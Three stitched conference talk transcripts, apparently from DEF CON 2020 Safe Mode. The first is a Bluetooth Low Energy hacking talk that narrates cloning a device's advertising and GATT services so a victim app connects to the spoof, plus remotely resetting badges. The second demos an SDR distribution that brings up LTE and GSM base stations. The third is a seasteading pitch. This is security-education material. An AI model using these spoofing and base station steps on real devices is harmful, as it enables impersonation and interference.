these in their pockets, they would automatically get this tone just going off in their pocket, and they would have to shut the device off. So, you can see where there is user impact, and there's also a circumventing of protections that are in place for Bluetooth low energy. So, successful GAT hacking there. Let's switch over to some more slides here. But we used the internal scan to reverse the Bluetooth commands that we saw coming across the wire, and then we used that in an out-of-application attack. So, let's move into cloning some services. So, this will enable us to really attack the application. Generally, there isn't a lot of value in spoofing against a peripheral, say like spoofing a user device. Although, I have seen that be, you know, a valid find where you can impersonate a legitimate user's phone, and then there is some interaction with the device. But without the long-term keys that have been passed, there's a really, you have an uphill battle basically in trying to spoof a user device against a peripheral. So, what we are going to do is spoof a peripheral device, and we are going to watch the victim attach to it from their application, and basically see all of the interactions that you normally would, and you don't even know that you haven't connected to your device. Meanwhile, if we were to push this further, what that would enable me to do is get a bonded session with my target. So, I would have those long-term keys exchanged with my target and be able to then exploit that further. So, I could either use some sort of proof of concept or, you know, have that deeper interaction with that user's device. So, what we're going to do is we are going to be spoofing the the blue fruit LE. I'm going to push some of this other stuff out of the way here for a second. I'm going to be spoofing the blue fruit LE. It's a real simple development tool. Adafruit has all these kinds of kits that you can use. This is intended for development. It's intended to learn with and to explore how Bluetooth development works. But why we're using it is because it has its own application and one that does not have spoofing protections in it. So, it's easy to basically prove this cloning concept. So, let me plug things in. You can see we've got power now there. Okay, so you can see that we have power there. The blue fruit module is on. So, what I'll be doing on my device is leveraging the scanner. So, I'm going to scan for devices right now. Hopefully we see this blue fruit pop up somewhere. Oh, there we go. Freaky Zen Sinister Sun Hat was a project that I had for Defconn last year, but it didn't quite make it all the way. What we're going to do is we're going to clone here this clone button. So, what I'm doing is I'm cloning the advertisement data now. So, basically, I'll be able to impersonate the adafruit unit on the advertisement channels. So, now that we've cloned it, what we can do is we can actually connect to the device. And we connect to it to get a return on the GAT services that are available. So, now that we've connected to, we can go here up into the upper right hand corner and we can go to clone device services. And you can see the little box popped up there and we've cloned the GAT services now. So, we've cloned the advertisement profiles and we've cloned the GAT profiles. So, now if we're able to turn these on, we're basically impersonating that device. So, what we have to do is then go to the GAT server and we have to turn on the GAT server to mimic the sun hat. So, there we have the GAT services turned on. And what we also have to do is go to go to our advertiser and we turn on the advertisement for the Freaky Zinn Sinister Sun Hat. So, now we are impersonating this device and hopefully we will get a connection to our target device. So, now that we've cloned all of the GAT services, what we have to do is go into the advertiser, turn on the advertiser for the Sinister Sun Hat, and then we also have to go in and change the name of the device. We're now advertising as a spoofed sun hat. So, we will update our scan here on the Adafruit LE app. And we can see the Phoenix 3. This is actually the name of the phone. So, the name didn't update on the phone. So, let's try and connect to it. And it allows us to connect to it as if it were the sun hat. So, the Phoenix 3 is this phone. This is my attacker phone. So, I've created a spoof from this phone and I've now got a connection in the application, in the Blue Fruit Low Energy application. And from there, it's not giving us the right information because we're not getting returns on that. However, if I go to the server information here on my attacker, I can change things like my manufacturer string. This is an attacker. We can set that. Now, we should be able to see that pop up there. You see it. Now, we've provided information on our attacker on the GAT service for the manufacturer name. So, now the end user is seeing that if we had a device that had more functionality, we could potentially send information from this device. Say we spoofed a thingy 52 and we spoofed or we sent temperature data out from there and this red temperature data. So, think about that in a real world example where say a building is relying on BlueTooth Low Energy sensors to control HVAC. Say we are able to impersonate one of those sensors and then provide fake information to whatever is reading that temperature and then making the judgments on what should be done about that temperature. If we can then create a scenario where it thinks maybe the temperature is rising uncontrollably, maybe there's cooling systems or maybe it kicks on the fire suppression systems or something. So, there is the risk of spoofing something and then providing information from that spoof. But I also have a connection now, a bonded connection to my target device that I could potentially exploit even further. So, we just went through the basic pieces. We cloned the advertisement data. We changed our device name. We cloned the device services. We went through and turned on the advertiser and then we actually connected through and provided a spoof that our victim connected to. So, I do want to introduce HackNAR's BLE CTF that it runs on ESP32. Like I said, if you've ever been to any of my in-person training sessions, I generally give these out to as many people as I can. So, I have maybe 10 or 20 of these that I give out. But obviously, since we are all safe mode and social distancing, then I can't really give a bunch of these out. But they're like $10 and you can upload all the information yourself. And you can actually go through a BLE CTF and it's more of just interacting on GAT services. So, what we went through earlier where we were doing the abusing of right privileges. So, there are a bunch of challenges on there. Some of them are decoding MD5 or following certain instructions that you get back from the services. So, if you have interest in exploring more on the GAT side, then I would definitely recommend checking out HackNAR's BLE CTF. And of course, if you need help, feel free to reach out to me on Twitter or wherever. So, a few recommendations for just kind of the individual BLE CTF user or your consumer. Keep your BLE CTF turned off unless you really need it. I know with the prevalence of BLE low energy devices, I find my BLE is being turned on more and more and kept on for longer and longer. So, this might not be valid information in a few years. We may just always have to just deal with BLE being on. Choose low traffic areas to do pin pairing sessions with. While it is fairly unlikely that there will be significant kind of leakage of keys or pins, there is the chance that that could happen. So, you're better off to choose sort of a controlled RF space where you know there aren't going to be a lot of people eavesdropping. Generally, your home is a good option or you know, an uninhabited part of your office maybe. Also, be aware that like we saw with the Blue Fruit LE app, a lot of apps don't have spoofing protection. So, you could very well be connecting to something that is not what you thought it was. And you've allowed an attacker to either provide you with false information or gain a bond of connection to your phone that they could then further abuse. And then I would also say that you know there are enough free tools out there that you could actually just start auditing all the Bluetooth devices around you and see can I abuse GAT services? Can I create a spoof of this device? How does the application handle that? You might need two phones for that but yeah. And then of course if you want to get deeper into that, you know, maybe pick up a dedicated testing phone like an LG M150, make sure it's running Android 7. So, yeah, those are a few of my recommendations for consumers. As far as developers, I'd like to push out of band pairing options just because it pushes some of that very privileged and important information away from the channel that is being used for data. So, using something like NFC to actually pass long-term keys will increase the security of the Bluetooth data because or the integrity of it because you don't have the risk of using basically an unprotected channel to pass keys to them protect it. So, you're using out of band practices. Don't focus solely on device security. You know, does your application have good spoofing protections? Is your app just basically looking for devices on name alone or is it looking, you know, for something deeper? What I like to, you know, dream and recommend is that, you know, that there be a remote server where you can actually validate the keys of a device before you ever connect to it through the cloud. So, say your cloud application would actually or your application on your phone would have a connection to a cloud server somewhere. So, before you actually even start a connection with a device, that advertising data and that key or short-term key would be passed to your cloud and then validated and if it's not valid then obviously you wouldn't connect or you could blacklisted or something like that. So, that's what I tend to recommend. As far as further study, there are a number of blue-teeth researchers but probably the one that I follow the most and the most enthusiastic is Jiska. I think I'm saying that right but she is a security researcher and yeah, RF kind of wizard out of Europe. So, yeah, follow her on Twitter. She does a lot of talks all over the place. So, if you're looking for books, Hacking Exposed Wireless is amazing. I just went through the coursework for the GAWN and it's very, very similar. Obviously, written by the same people so of course there's going to be knowledge kind of overlap there. And if you're looking to get more on the hands-on side then the Adafruit Bluefruit LE, the Thingy 52 ESP32s and the UD100 Bluetooth USB Adapter which we didn't cover in this talk but is capable of doing more long-range stuff. So, that's definitely something you'll want to pick up if you have an interest in taking this further. Okay, so with the badge just on, if you just turn it on, you can see the Bluetooth Mesh pop up in an NF Connect. But I'm not able to connect to it. So, I'm able to see the Anodexor badge within NF Connect. The Bluetooth Mesh you see there is listed as such. And I can try to connect to it. And I have a connection to it and it's giving me certain options. I've done some poking around on this side but I haven't found a lot. This SMP characteristic might be fun to poke around with. But what I have seen is within the SMP characteristic you can actually do some interesting commands that have these bright values here. But OS Echo commands, so you can echo commands through Bluetooth into the operating system. I haven't got much interaction from that. I've tried the Bender commands but it hasn't really worked. But the one that I have seen that works very well is the Reset command. So, I will switch over here. So, as soon as I hit the Reset command, you'll see the badge turns off. And then the badge turns off. Last year, if you were at Def Con and they were talking about the Bluetooth Mesh where you could attack other people's devices, you could connect to the badges and then you could send these commands. Turn people's badges off or make it do different things and different commands. So, very cool puzzle and interaction and tool for learning. So, if you have one of these badges, one of these Anonix or DC27 badges, or I believe the one before that also had a Bluetooth Mesh on it. But if you have one of these badges, they would be awesome to hack on. Yeah, so they have that Bluetooth component. That's going to wrap up my presentation. And I just want to thank you for spending the time with me today and learning about Bluetooth Low Energy Hacking. Hopefully you learned something. Hopefully you found something that maybe caught your interest and you're ready to explore the Bluetooth Low Energy devices around you. Don't forget the further study that I pushed out in one of the last slides. And if you have any questions, feel free to reach out on me on Twitter or LinkedIn or anywhere really. And I will try my best to get in touch with you. I know sometimes I don't do a great job, but yeah, so thank you so much for joining me. And I hope you have a wonderful, wonderful DEF CON safe mode.
|
Evolving over the past twenty-two years, Bluetooth, especially Bluetooth Low Energy (BLE), has become the ubiquitous backbone modern devices use to perform low energy communications. From mobile, to IoT, to Auto, most smart devices now support Bluetooth connections, meaning that the attack vector is becoming an increasingly important aspect of security testing. This talk will breakdown the various phases of testing Bluetooth devices with an emphasis on sniffing BLE connections, spoofing devices, and exploiting GATT services. We will cover key components of the Bluetooth protocol stack, and the tools required to start testing BLE in your home, or as part of a Bluetooth pentest. This talk will also demonstrate that all you need to start testing BLE is an Android or iOS device, and a bit of curiosity.
|
10.5446/51662 (DOI)
|
Alright, good morning, afternoon, evening, whatever time it is when you get around to watching this. I'm pretty excited to be participating for the first time in DEF CON. I really wish, obviously I could be there in person. It would be far easier to present this if I was able to see people face to face. And you would see, you know, my passion and excitement. I'm sure you might not hear it in my voice. But this is a project that I have been working on for about the beginning of the year, maybe even into last year. And that is Dragon OS Vocal. Like I said, my name is Aaron. It's DEF CON 2020 Safe Mode. So we'll go down through here. I've got just a few slides and then we'll go right into just kind of showing you what Dragon OS is. Background on it. I personally was working on some tools right prior to COVID-19 to try to aid in teaching software defined radios, SDRs. So I had kind of that going for me. And then a couple projects way back, 2008, 2009 or so, I built everything that was AWD mesh. Some of you may be familiar with OpenMesh back then. I wouldn't add the OM1P. So I was kind of on my own using some open source and the router station. Everyone probably had one at one point or another and built OpenMesh with a few other people there sold the stuff all over the world, dual radio mesh equipment. And then about that same time, I was pretty active in the zone minder forms for some reason or another. But I first noticed that people have a lot of problems with compiling things and building zone minder from source. So I thought, well, why not use Remaster Assist and help people out and get it all prebuilt and working. So I kind of take those two things and it got me thinking about doing another distribution. And then of course, COVID-19 hit really big and a lot of people stuck at home. So I thought, well, why not take my little project, take it to the next level, get it out there to the public so people could install, have something fairly new in terms of software, free and get into software to find radios while they were stuck at home. Put that out to the public. A lot of people were interested in it, RTLSDR.com and Hackaday did a few articles here. I just copied and pasted one article that you can see was dated back March 24, 2020. It talks a little bit about the project. So if you look online, you'll find a lot more articles. But the progress I've made, I started with Debian Buster, just called it DragonOS 10. That was actually, Debian is probably my favorite. I had a lot of tools in there. You can find that on SourceForge. I just got to a point where I wanted to be able to support disk encryption and UEFI. So I moved on to Lubuntu 1804, called that DragonOS LTS. That was, the bulk of my time was spent making that. I think I've made the most videos on that. And I guess I should point out too, I tried to keep all distributions, even though, you know, went from Debian to Lubuntu, I tried to keep as close as possible I could with the tools and applications that were installed. So for the most part, any of the videos I label should apply to any of the builds, hopefully. Well, anyways, so now I'm on to Lubuntu 220.04. And I just called that DragonOS focal. So yeah, the goal I spend, I don't even know how many hours. All these, you know, countless amount of hours, pre-installing anything I could possibly find that would be of interest to people that are into software-defined radios. That could be from repositories, dev packages, you know, Source, so on and so forth. And I try to combine it all and spend and just be meticulous about everything working together. So you know, from remastering it to installing it to testing the whole installation to checking every possible software-defined radio I can with it, or at least that I've owned or have been donated. You know, I have B205 here, USRP radio, RTL-SDR, Blade RF, some SDR play equipment. The SDR play people were extremely helpful in sending me some equipment out. That's been really awesome. Ubertooth from Hackers Warehouse, they were really nice, sent some equipment out. And then as I kind of go through, I'll point out, I'll say thanks to a lot of people that have helped just with input and kind of behind the scenes discussion on what software is out there and what to include. All right, so let's get out of the slides here. And you know, I try to do everything within DragonOS, which is running right now, my latest build, which is I was going to put out in conjunction with this. I just kept it still a beta build, DragonOS, Focal, public beta 3. That's what's running this right now. I have to admit I was not familiar with OBS and making videos like this, so hopefully it comes out okay. So we'll get down off the slides here. This is DragonOS. I know it doesn't look like much. You're just looking at the desktop here. But this is running live from a USB stick. I've made it as easy as I can. You can see there's a little icon on the desktop. I've actually already ran through the installer, but I will show how easy it is to get it to install. I'll come through here, answer a few questions. I'll just uncheck this for now, just so that it's not hanging here and you all are staring at this screen while it's loading. So yeah, okay. So it's not going to, I'm not going to make this video over again, but just trust me, I've already ran through the installer and it finished. Normally you would reboot. That's why you see that error pop up there. Anyways, I'll just let that run in the background. That was kind of to show you how easy it is to install, I guess, lesson learned. Don't run it twice within the same as it's running live, but it's kind of hard with it. I have everything set up to make this video. So anyways, one of the big things, I'll just go right down the list. I wanted to demonstrate here so you can get an understanding of why is this any different than any other distribution. You've got Kali out there for your offensive security or pen testing. I just tried to make this distribution all about software defined radios. So base Lubuntu system with everything installed on top of it. One I'll point right out at the front. I've actually got it running here. SIG Digger that I've put in here, built from source, find this program really great. The developer has been super awesome. I know he was trying to help me out to have a TV decoder, I guess you'd say, with sync and everything ready for this. But I think you all will see that here in the near, real near future. So keep an eye on that. But what I'll show you is SIG Digger running using the B205 Mini that I have here. And if you happen to have, so I have a 5 GHz antenna on it, I've got a 5 GHz FPV cam sitting here. So if you open up your sample rate and your bandwidth, you should be able to do what I'm doing here, which is, we'll look at this in the spectrum. I've got my window open as far as I can here. I've got a inspection tab open here. And then I've got an FSK inspector. So that's another thing. When I make these videos, I try to go through and get people interested in what these different acronyms, FSK, means, and, you know, I don't explain everything, but I hope I generate enough interest where people will go out and do some more research. So I've opened up the FSK inspector here, and you'll see where I've paused before the video so you know what's coming here. Let's just open this up the whole way here. Let's close out of this. We'll open another inspector. You would bump up your, it's per tone and start the clock recovery. I come up here, I left click and drag and open this aperture up here, release, uncheck fit the window and click record and come down to about the, let's see, 550 or so, and you should see where I left off here. And this is live. This is capturing this live. I had hoped to literally just record the whole video like this, but not, you know, in such a way that I'd give everyone a seizure or something. So that's, I felt that that was a really unique, very powerful signal analysis tool. And that just shows you that's literally out of the box. It's running live. You don't have to use a B205. I've actually did this with a hacker F. So, you know, as long as you can get in the five gigahertz range, you should be, you should be fine. I'm sure I could probably do it with the, some of the blade RS that go up that far. This is a blade RF micro eight XA four, I think it is. So yeah, that just shows you that's really not the primary feature of this or of that window, that symbol stream window. It just happens to, to be able to do that. So I'm sure if you pause you'll, you'll see me and yeah. So let's see, anyways, I'm going to close out of this. I'm going to change out a couple of things here. What I want to show is we'll open up a few terminal windows here. I'll do this as quick as I can here. This is just to show you something else that is on here and running out of the box. I grab a few cellular antennas here and I'm sure a lot of you are familiar with SRS LTE. I had a big interest in getting LTE and GSM actually as well running out of the box. I know there's a lot of interest in that. Obviously you got to have shielding and stuff when you're transmitting any of this. So I just recommend be careful when you're doing any of what I'm showing here. But let me see, SRS. So this just shows you how fast we can get up and running. We'd want to start our core networking, our EPC here. Let's see, we can bring that online. We would do our EMB. For this I found that it will use the EDIS by default. But these two commands start out the core network and then starting up your EMB. That failure you see there, that's SOPE for SDR play. What I have done is when you run the installer, that's another thing that makes this unique, but you run the installer and then you reboot, you're going to be presented with a little pop up that will prompt you to install the SDR play. So that'll happen, your user will be added to Kismet so everything just kind of works out of the box. I know I keep saying that. So these two commands here, I'd have to, of course this happens right when I do the presentation. But let's see, with those two there you can be up and broadcasting your base station basically. If you had a second laptop and another EDIS or a Blade RF which I have demonstrated in some of the YouTube videos, you can use a virtual handset through that radio to connect. So yeah, that's how easy that is. That's all pre-configured and working. You can do the same in my latest build with GSM now. So I'm sure a lot of you are probably familiar with Osmo-com here. I've got the HLR, the BTS, the BSC and the transmitting all in here. So you should be able to get a GSM base station up and working pretty quick if you have a EDIS. So if we start up our BSC and we start up our... Okay. And then if I start up my... Might be a... That's... I will see. Now you see how we've got our base station online. I know there's an error here. So you can... This is actually something I'll address in the next build but that's actually a pretty common thing and explained on you... EDIS how to get around setting the threat priority. So there's three things right out of the box, a weighted to code 5 GHz video, the LTE network, GSM network. Something else that I do is I keep everything that I install from source or not a packaged installation. I keep it all here in the actual build when you finish installing it so that you have all of the source that you need to make any changes or uninstall anything that you may want to remove. Let's see. I'll show another example here. So GNU Radio 3.8 is in here. If we take a look at... Let's just take a look at GR RDS. You'll see right there you got ADS-B, DEC-2 and I've checked all of this. GSM in GNU Radio 3.8 works perfectly fine with the MZCatcher script. You got Radeom there. Not super familiar with satellites but I've included that. GR Tempest, I checked that and actually got that working with some SDR play equipment and was able to view a monitor without having to use the Tempest SDR which I know a lot of people use. So if you want to get into GNU Radio which I recommend, you can take a look at one of the examples here, real easy one. And again, I really feel like a benefit of this distribution is you can run it live. If you don't want to install it, there may be some things that may have some issues running live but for the most part, it works pretty well. So this is GNU Radio, I'm sure a lot of people are familiar with this. So again, right out of the box. You got your RDS on there, you got your game settings. So I have tried to go, or I have went through every application you can possibly think of on here, SDR trunk, air band, retrogram, everything. I have spent a lot of time making this work. So I know I said that I'd thank some people here, I'm trying to think what else can I open up and show before we, or before I close this out. Just run down the list here. You see under Internet, you got GQRX, SDR Angel. I just recently built SDR Angel with soapy support. So now I can't not show SDR play equipment in this video considering how much help that they have given. So this is a RSP1 Alpha and SDR Angel. See here, so now we can use our SDR play equipment. Actually, you know what, since we're running live, I'm going to fix this real quick. See, there's always something because I haven't, because I haven't installed and rebooted, my script didn't take place. So I just, when you're running live, you would have to actually install the API. So now we should be able to come back here, open up our SDR Angel. Now thinkors crossed, we have our RSP1 Alpha. You can add a, well anything, you can do DMR, DSD, the modulators, DATV, all sorts of options here, oops. There we go. It doesn't get awkward when you're doing something live and then it doesn't work like you expect. Okay, turn me off there a second. So that's SDR play equipment in SDR Angel now. There we go. Okay, so you gotta obviously adjust the game correctly there. So that's SDR Angel. Same thing if you come down the list here. We've got QBic SDR, QBic SDR with SDR play support. Q Spectrum Analyzer really good to use with the hacker F. If you want to do some replay capture and replay attacks, you got Universal Universal Radio Hacker. That also, yeah, actually I should have put SDR play support next to there which I believe, I believe it. No, actually, that does not have SDR play support yet. They're still, it's still being worked on. Let's see what else. We've got Spike which is the gentleman by the name of Rick who suggested I do this video. He's a big fan of that equipment, that program. Let's see what else. And then really anything else that's sitting in the, that is not installed with a nice easy to click GUI, you can run from here and you can kind of get an idea there. So Sparrow Wi-Fi, matter of fact, I know a lot of people are familiar with Kismet. I suggest taking a look at Sparrow Wi-Fi too. They've got some nice integration there with the hacker F and Ubertooth. I don't actually have my hacker F right now, but what you can do with Sparrow Wi-Fi is overlay the 2.4 GHz and 5 GHz spectrum over top of your wireless NIC card that would run up in the top here. And of course, do similar to Kismet but really not do the full packet capture and getting the clients and stuff. You'd see the access points. And so not to give away all my access points here, I'll just kind of show you the spectrum analysis with the Ubertooth that's plugged in here. So thank you to Hacker Warehouse for that to let me check that. All right. Let's see. So I think that's enough kind of programs. I hit on a lot of the big stuff and I would encourage anyone to take a look at the YouTube page that I have here. So, I would say I would encourage anyone that wants to know more, take a look at my YouTube page here, CMAXecutor. You can come down through all of the videos that I've put on here. I don't know. I think there's about maybe 60 or so over all sorts of various different topics from showing the installation to doing capture and replay, using the Kerberos SDR for direction finding, proof of concept on smart cell phone jamming, signal analysis, spy server, everything you could think of. I've tried to cover here and educate. So, I think that about wraps it up. If you need to find the project, you can just Google DragonOS. You can do Focal if you want. That's the latest. You'll come find it on SourceForge. You've got your files and you'll get your latest there. So, yeah, I appreciate everyone kind of listening up to this point and just want to say thank you to developer of SIG Digger, the SDR Play Equipment, Hacker's Warehouse. I'm drawing a blank right now, but there's been so many, oh, why everyone on YouTube that has provided suggestions or emailed me kind of behind the scenes. I appreciate it. I hope that this has been helpful during COVID-19. I know that a lot of people have been stuck at home, so I just wanted to try and do what I could to help others. All right, thanks.
|
Intro Why I started DragonOS What is DragonOS What problems and challenges I had to overcome What companies and developers helped and who donated equipment
|
10.5446/51635 (DOI)
|
Hello and welcome to this presentation on seasteading. My name is Grant Roman. I'm from Ocean Builders and today we'll be talking about how to hack the sea pod. The sea pod, we'll talk about what that is a little bit later. People usually ask me first though, what is a seastead? Basically, a seastead is a home that is engineered to float on the ocean. People have been fascinated with living on the water, people have been fascinated with living on the ocean, and even the idea of building an entire city that floats on the ocean. This has been an idea for a very long time, but no one has actually done it. No one's cracked the code on this. We've seen some beautiful images, we've seen some beautiful pictures. Here's some conceptual drawings of images of these whole entire floating communities that were beautiful. The problem with them, the reason why this hasn't happened yet, is because this costs a lot of money to do. This is like a multi-billion dollar project just to get started, not even to really do very much at all. Building a city is a huge thing that is usually done in small increments where you can use a small increments, and then it grows bigger and bigger and bigger. To start something on the water, it actually costs a lot more than doing it on land. No one's really cracked the code on how to make it affordable to do. Until last year, February 3rd of 2019, something monumental happened and a huge milestone was made, and the first original prototype of the single home Seastead was launched. I'll just play the video here so you can see it. This was in Thailand, 13 miles off outside of the coast of Thailand by Phuket. It was beautiful, it was amazing. It was a beautiful thing, but the prototype itself was not very attractive, not very pretty. But the technology to do this is the same technology that is used on an oil rig where you have a deep spar that you can see a metal pole going into the water and the house actually just floats on top of it. But the metal pole goes really deep into the water and creates a source of buoyancy which pushes the house that's above the water up. Then you basically, your house is above the waves. You don't have to worry about big waves coming and making your house move around. It's actually very stable because of this, because you're not at the surface of the water level, so it's actually very stable and nice to live in. What I loved when I saw this was that I saw that this could be the new frontier. It's like many years ago, America was the new frontier. It was this new land to be discovered, new opportunities, incredible new opportunities. I believe that if we do this right on the ocean, that the ocean can be the new frontier. This is really exciting. I think there's so many technologies that can come from this. I kind of have the philosophy that we should do the ocean first and then Mars. It doesn't make any sense to spend tens of billions of dollars to send something to Mars when we can actually, for a very small fraction of that, we can start building thriving ecosystems on the ocean today, like right now. The technology is here. It's really exciting because I think maybe 10 years ago, we didn't have all the technology to do this, to make this feasible. But now all this technology is evolving, it's coming available very, very quickly. It's to the point where we can put all these technologies together and make them work and make a home on the ocean that is affordable and is eco-restorative and has all these other incredible benefits. I think the opportunities are very exciting. When I first was on the original Seastead by Thailand, it was really ugly. It was a diamond in the rough. You had to have a lot of imagination to see where it could go because it was not pretty. We've spent a lot of time since then to redesign it, to make it sexy, to make it beautiful, to make it inspiring, to want to actually live there. We have our new design model that is called the Seapod. Seastead is a basic class of this floating home idea. With every major innovation, major change, sometimes that is such a dramatic change that it causes fear in some people. That happened in Thailand. If you hadn't heard, our project became very well known because the Thai Navy actually decided to invade our Seastead. It was frontline headline news around the world. Most major newspapers, TV shows, radio programs covered the story because we were actually on the run for a long time. The Thai Navy was chasing our team and they were threatening the death penalty and life in jail and saying that this was a threat to, like this was an act of terrorism and all kinds of things. So at the time it was horrible, but now in retrospect it brought a lot of attention to the whole movement and I think it's helped a lot. But while it was going through it was kind of a little bit scary. So some of the media that's covered us is all the big names that you would recognize and know. So we almost ended up in one of these, which is a Thai prison, which is some place you don't want to end up. It does not look like a comfortable place to be at all. But as Chao said in the movie, the hangover, but did you die? And the answer is no, we didn't. And here is our hero picture to prove that we survived after the big rescue, which a whole book and movie is being written about because it had all the elements of James Bond thriller kind of movie. So it's pretty interesting what happened. So now we are in Panama. This is the location where we will be building the first community of homes. This is the exact island that we will be on where our manufacturing plant is in construction. This is the early pictures. This was back in February. We've gone a lot further now. These pictures have not been, these are the first time these pictures are being shown. This is our manufacturing plant now mostly built. We're still missing the front door, but that's okay because things are going on in the inside. So we're going to show you during the live part of the presentation here, we'll be showing you some more pictures, some of the things we've been building, some of the things we're putting in the water. And so, and we'll talk about a lot of the technologies we're going to be developing. And that's one of the really exciting things about this thing is that to be able to live on the water, we need to develop so many different kinds of technologies and so many, we need to innovate so many different things that haven't existed before because we haven't had a need to live on the water and do it in a way that's eco-sustainable because the way we've built homes and built a life for ourselves on land has not been good for the environment. We usually clear cut a forest before we put a house out and that's just not good. But when we put something in, when we build something in the water, it actually becomes a habitat for life and we're trying to do it in a way that life can actually thrive and actually add more life to the ocean instead of damaging it. So there's a lot of really innovative technologies we're working on for the seapod and we're really excited about a lot of these things. We have a huge 3D printer, we'll show you some pictures of that later. It's 20 feet long by 16 feet wide and 8 feet tall and our goal is to eventually be able to print an entire house with a 3D printer. We're not there yet, we're right now starting with printing molds and then making the houses from the molds itself. There's a lot of IoT technology we're developing, home automation for a home on the water which is very different. We're developing hydroponics so your home can be self-sufficient. We're developing aquaculture systems, coral gardens so you can actually instead of having a front lawn with a garden, you'll actually have an underwater coral garden potentially as an option. There's aquatic transport drones we're building to be able to transport garbage and take out the garbage basically to take out the trash. You'd have an automated drone that comes out and does that. We have desalinization technology we're developing, there's marine sensor stations we're developing so we can get advanced notice on what the weather is going to be like and what the marine conditions are like and we can actually monitor what the conditions of the ocean are so we can actually measure over a sustained period of time or a long period of time what the environmental impact of living on the water is. We can actually show scientifically that our homes are actually helping to restore coral in the area because we're going to be doing a number of different projects to help restore the marine ecosystem. Not just one thing is to be able to print, 3D print a coral design that has the optimal shape that coral polyps love to live in. We can do that by scanning existing coral and see the exact shape of a little nook that they like to live in so we can recreate that in 3D printing designs. Then there's other techniques, there's like five or six different techniques for doing coral restoration that we're developing as well and we're hoping to partner with other companies that are doing these things because there's so many different things that need to be developed to make this happen. We're kind of trying to reach out to the community, we're trying to reach out to people and say hey this is the new frontier. I think this is the most exciting thing humanity has on the go right now that is possible and feasible for anyone to just say I want to get involved and actually make it happen and it's feasible. It's not like doing a startup and going to Mars. It's a massive project, takes a lot of money. This is something we can do, we can actually decentralize a lot of the development of this technology so people around the world that are right now on lockdown maybe and don't have a lot to do can actually find ways of contributing to this project. That brings me to something that I'm really excited, we're announcing at first here on this conference is that we are releasing all of our technology, we're releasing all of the programs we're doing and we're releasing the designs of our C pods, all the software and releasing it to be open source. We're doing this because we want this to happen. We are not doing this for any other reason than we are passionate about it, we love it, we love the idea of being able to live on the ocean, being able to open this new frontier, being able to develop new technologies, eco-sustainable technologies, marine restoration technologies and all the other things that need to be developed to make this happen. It's really exciting. We're all just, there's a lot of, there's a very big community of C-STETers. There's actually a big community at DEF CON that's like a big on C-STETing but outside of that as well there's a huge community that are really passionate about seeing this happen. We have a decentralized team all over the world that we're trying to get them to collaborate and get them to focus on different areas of development and if we can do this, I think we can make 20 years of development progress in the next couple of years if we can do this right, if we can really focus and find a way to make it happen. It's really exciting time for us and we hope to put the call out to the community here and say, well, who wants to be involved in this? Who wants to help out with this? Who wants to contribute whether it's just writing a little bit of software code or maybe making a design for a floating drone or your own floating house design that you think might be better than what we're doing? You can actually take our designs, you can take our software code, you can take our designs for the, I've been sweating over for the last year plus and you can say, well, that's really beautiful, I love it but I want it to be longer, I want it to be taller, I want it to be a different shape, I want, you know, whatever it is, you can take our CAD drawings which are being, everything's in the process of being uploaded, hopefully by the time this presentation starts, a lot of our code is going to be on our GitHub account so you'll be able to go there and download code and start playing with things which is what we want to see happen, we want to see this progress, we want to see this move and it's just really exciting, I think we can do a lot and I'm kind of inspired by the idea of this lockdown for a lot of people has been horrible, it's been kind of boring, it's been a time of frustration and I think we can maybe turn things around and what if we could mobilize millions and tens of millions of people around the world to actually do something productive with their time if we had millions of people contributing just a couple hours a day to different projects that they're passionate about, put all that together and we could have an incredibly different world, new ideas, new techniques, new things that we weren't even thinking about before, they can develop very quickly but we have to just try to find a way to focus their energies on something that is productive and I think we have a track here for developing technologies on the ocean to build floating homes and a floating ecosystem that can thrive and has a lot of potential I think for humanity so I'm really excited about it, I'm really excited about opening this up to the open source community and having you guys take what we've been looking at and what we've been trying to do and what the C-Steadding community in general has been trying to do and we want to move this forward so I invite you to take part in the whole conversation we're going to be having here today, we're going to be sharing a lot of things we haven't shared publicly before and giving a lot of things away so yeah we'd love to have you involved, we have mobile app, all the code for our mobile apps is being uploaded it's probably going to be here by the time we start this presentation, the back end software for controlling C pods, controlling floating homes is all going to be there, IOT software it's still in development but we might have something to upload by the time this conference starts, IOT hardware, we have all kinds of things coming together so we'll be posting our plans for hydroponic system that is really cool, I think it's a super high yield technique for growing food that I'm really excited about, we'll be putting as soon as we have Gerber files for the actual circuit design for our home automation hardware we will be publishing that as well so it's very exciting lots of stuff going on so CAD drawings for all our models, CAD drawings for our boats and once again we just want to open it up and if you have a better design or newer design or maybe there's parts that we're missing that need to be designed we're just asking for people to, if they're passionate about this, to contribute and see where we can take this, I think we can take this to something really incredible so we're going to start now a movie that we made to kind of show what's been happening with with seasteading, what happened with our event in Thailand and the whole controversy that happened over there so this is a little presentation that kind of takes you through all that so I hope you enjoy it then we'll come back and we'll go into the live section Welcome to Exly the first seastead, as we come in from this beautiful entrance, we have this before and here's the kitchen, we're not used to all of her magic, anything special about the kitchen? Just fresh water, we could refill as needed but we've never had to do that because I have a water maker This is the big kitchen table underneath, it is actually where this bar entrance goes, I would let it show you but there's a hood out there, we have a nice little electric room, I understand electricity There's a little hidden storage, all of this, it's kind of a good size but also a good closet Pretty decent size, should be great for all these small home lovers out here So you have so many? Yeah, all right, we got some islands off in the distance so that's only said 20 miles out, I'm gonna go and spend the day on the island, you're a little tired of just floating around So plenty of the sea out here, all within a short sailing distance, all right that's it About two days ago there was an article in the Thai media saying, talk about the sea state, basically right out of the map saying it was a threat to national security, I can't see how they would see a loving couple letting it get in their home on the water That's a threat to national security, we understand how the media works, the Thai land is basically a mouthpiece for the government So anything the government needs to do, they just use the media to express it, basically set the narrative so that people know where they stand There's some contacts we have from the military, we contacted them, they said, yep they're all up in arms about your sea state They're all up in the military at the top level, they're feeding their chests, they're trying to one off each other, we can shoot it down the best Just until the night we were trekking through mud, pushing our knees out at low tide, trying to quietly get out of Phuket, it was all stories were BS The way things work in Thailand is it's a military dictatorship, so if they want somebody to give them trouble they just take them out We're not going to take the chance that there's no due process, they obviously displayed by taking out our sea state, destroyed our home, I had everything, I owned their, just had a bag with clothes that I was in Phuket, unfortunately I was in Phuket, otherwise they probably just take us down with the sea state Chad Elwartowski's sister says sea-steadying has been a dream for him, but one that has now turned into a nightmare Oh my god I'm sick, I'm just so sick about it, I just want him home Family and friends of Chad Elwartowski fear his life is on the line, he and his girlfriend are now on the run after Thai police officials accuse them of essentially trying to lay claim to Thai territory with their floating house All the sudden it changed to where he became a fugitive, it was almost like you're reading something out of a movie My greatest fear is that he's going to end up killed through all this They were just living there, they didn't build it, they didn't buy it, they were living on the 